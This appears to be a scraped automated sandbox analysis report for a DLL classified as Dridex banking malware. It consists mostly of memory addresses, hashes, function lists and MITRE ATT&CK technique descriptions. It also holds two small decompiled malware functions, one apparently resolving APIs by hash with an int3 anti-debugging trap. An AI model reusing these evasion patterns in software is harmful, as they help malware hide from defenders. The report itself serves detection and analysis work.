0x70991b8b
0x70991b93
0x70991bb3
0x70991b95
0x70991b95
0x70991b9d
0x70991ba6
0x70991ba6
0x70991b9d
0x00000000
0x70991b93
0x70991b04
0x70991b0b
0x00000000
0x00000000
0x70991b18
0x70991b1e
0x70991b23
0x70991b2a
0x70991b2e
0x70991b43
0x70991b45
0x70991b47
0x70991b4d
0x70991b5b
0x70991b5b
0x70991b61
0x00000000
0x70991b61
0x00000000
0x00000000
0x00000000
0x00000000
0x70991aab
0x70991aab
0x70991aab
0x70991aac
0x70991aaf
0x70991ab3
0x00000000
0x70991ac9
0x70991acc
0x70991acf
0x70991ad8
0x70991adb
0x70991adc
0x70991ade
0x00000000
0x70991519
0x7099151b
0x70991520
0x7099152b
0x70991539
0x7099154c
0x70991559
0x70991562
0x70991566
0x7099156a
0x709915b2
0x709915b2
0x709915b4
0x709915bb
0x00000000
0x00000000
0x709915d4
0x709915dc
0x709915e0
0x709915f5
0x709915f9
0x709915fd
0x70991606
0x7099160c
0x7099160f
0x70991613
0x7099161b
0x7099161d
0x70991621
0x70991628
0x70991631
0x70991631
0x70991635
0x7099164a
0x70991660
0x7099166d
0x7099166e
0x7099166e
0x70991670
0x00000000
0x00000000
0x00000000
0x00000000
0x7099162a
0x7099162a
0x7099162a
0x7099162b
0x7099162c
0x00000000
0x7099162a
0x709915ef
0x709915f3
0x00000000
0x00000000
0x00000000
0x70991674
0x70991674
0x70991675
0x70991678
0x70991682
0x70991682
0x70991686
0x7099168d
0x709916e8
0x709916ed
0x70991740
0x70991740
0x70991744
0x70991748
0x70991572
0x70991575
0x7099157a
0x70991580
0x70991583
0x7099158a
0x7099158e
0x70991595
0x7099159e
0x709915a2
0x709915a6
0x709915ac
0x00000000
0x00000000
0x00000000
0x709915ac
0x70991752
0x7099175e
0x70991769
0x70991770
0x70991779
0x70991783
0x70991784
0x70991792
0x70991797
0x70991798
0x709917a5
0x709917aa
0x709917bc
0x709917c1
0x709917c6
0x709917d8
0x709917ea
0x709917ef
0x709917fa
0x70991801
0x70991806
0x7099180e
0x70991817
0x70991817
0x70991823
0x7099182a
0x70991836
0x70991842
0x70991850
0x70991861
0x70991868
0x7099186d
0x70991876
0x7099187b
0x7099187d
0x70991881
0x70991885
0x70991892
0x7099189f
0x709918a3
0x709918b7
0x709918bb
0x00000000
0x00000000
0x709918d0
0x709918d2
0x709918da
0x709918d7
0x709918d7
0x709918d7
0x709918de
0x709918e0
0x709918e6
0x709918ec
0x70991948
0x70991951
0x70991955
0x70991962
0x7099196b
0x70991970
0x70991974
0x70991977
0x709919d8
0x709919ee
0x709919f9
0x709919fa
0x709919fb
0x709919ff
0x70991a02
0x70991c82
0x70991c85
0x70991c85
0x00000000
0x70991a02
0x70991981
0x70991991
0x7099199a
0x709919a3
0x709919ac
0x709919ad
0x709919ae
0x709919b3
0x709919bb
0x709919c3
0x00000000
0x00000000
0x00000000
0x709919c5
0x709918f5
0x709918fa
0x709918fe
0x709918fe
0x70991902
0x70991905
0x00000000
0x00000000
0x70991926
0x70991928
0x7099192c
0x7099192e
0x00000000
0x00000000
0x70991930
0x70991937
0x70991943
0x00000000
0x70991943
0x7099190a
0x00000000
0x70991a08
0x70991a08
0x70991a09
0x70991a19
0x70991a25
0x70991a2e
0x70991a37
0x70991a40
0x00000000
0x70991a40
0x709916ef
0x709916f1
0x709916f3
0x709916f8
0x709916fd
0x70991710
0x70991726
0x7099172f
0x70991730
0x70991730
0x70991732
0x70991733
0x70991736
0x7099173a
0x00000000
0x709916f3
0x7099168f
0x70991699
0x7099169a
0x7099169a
0x709916a7
0x709916b3
0x709916b5
0x709916b7
0x709916bb
0x709916cb
0x709916cb
0x709916d2
0x709916d5
0x709916d6
0x709916da
0x709916e4
0x00000000
0x709916e4

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6514f61d203c4bc537fffae0cb3ce96e0b0359880b4747956ee158e8482bf6ff
Instruction ID: b47a7f369a46595722ff20b04ce79a95e96f13c29b7b9eca90be9f9af2a213e7
Opcode Fuzzy Hash: 6514f61d203c4bc537fffae0cb3ce96e0b0359880b4747956ee158e8482bf6ff
Instruction Fuzzy Hash: 1A325471518345DFC715DF24C891BAEB7E9BFA4308F208A2DE496873A0EB30A945CB57

Uniqueness

Uniqueness Score: -1.00%

Function 70986DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E70986DC8() {

				 *0x7099d280 = GetUserNameW;
				 *0x7099D284 = MessageBoxW;
				 *0x7099D288 = GetLastError;
				 *0x7099D28C = CreateFileA;
				 *0x7099D290 = DebugBreak;
				 *0x7099D294 = FlushFileBuffers;
				 *0x7099D298 = FreeEnvironmentStringsA;
				 *0x7099D29C = GetConsoleOutputCP;
				 *0x7099D2A0 = GetEnvironmentStrings;
				 *0x7099D2A4 = GetLocaleInfoA;
				 *0x7099D2A8 = GetStartupInfoA;
				 *0x7099D2AC = GetStringTypeA;
				 *0x7099D2B0 = HeapValidate;
				 *0x7099D2B4 = IsBadReadPtr;
				 *0x7099D2B8 = LCMapStringA;
				 *0x7099D2BC = LoadLibraryA;
				 *0x7099D2C0 = OutputDebugStringA;
				return 0x7099d280;
			}

0x70986dd9
0x70986de1
0x70986de4
0x70986df3
0x70986df6
0x70986e05
0x70986e08
0x70986e17
0x70986e1a
0x70986e29
0x70986e2c
0x70986e3b
0x70986e3e
0x70986e4d
0x70986e50
0x70986e5f
0x70986e62
0x70986e65

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1640a0ea579edb9a071d75c85d3b1118d80d234a5bdf71dc460a7681a76c38b
Instruction ID: 628b789dafaf72fac3db528a1c52d6cf12ac82dbbbb370d07d67e19e6be70aaa
Opcode Fuzzy Hash: a1640a0ea579edb9a071d75c85d3b1118d80d234a5bdf71dc460a7681a76c38b
Instruction Fuzzy Hash: 2011DFB9A39610CF8358CF0AD590A517BF1FBCE31032181ABD889AB375D7349945EF94

Uniqueness

Uniqueness Score: -1.00%

Function 7098BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E7098BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E7098C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E70992F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x7098bc01
0x7098bc03
0x7098bc0a
0x7098bc29
0x7098bc2a
0x7098bc0c
0x7098bc16
0x7098bc1d
0x7098bc23
0x00000000
0x7098bc1f
0x7098bc1f
0x7098bc21
0x7098bc22
0x7098bc22
0x7098bc1d

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 473b59e5f3633d190f238621e5551000f946855255c7e09fb0835537496901d3
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: E6D012B21002436AEF151739FE0075DE7AD4FC1155F18085A654167299CFB684524026

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report BJKPKLUPiD.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6528 Parent PID: 5984

Function 008F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 709907CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 70981494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 7099218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 70992790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 70993060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 70991140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 70995720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 70995AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 70995B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 70995B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 70995B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 70995B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 70995B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 70995D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 709910CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 709955B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 70995DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 70993564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 70989144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 7098A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 709884E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 709992DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 709914D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 70986DC8, Relevance: .0, Instructions: 36
COMMON

Function 7098BC00, Relevance: .0, Instructions: 16
COMMON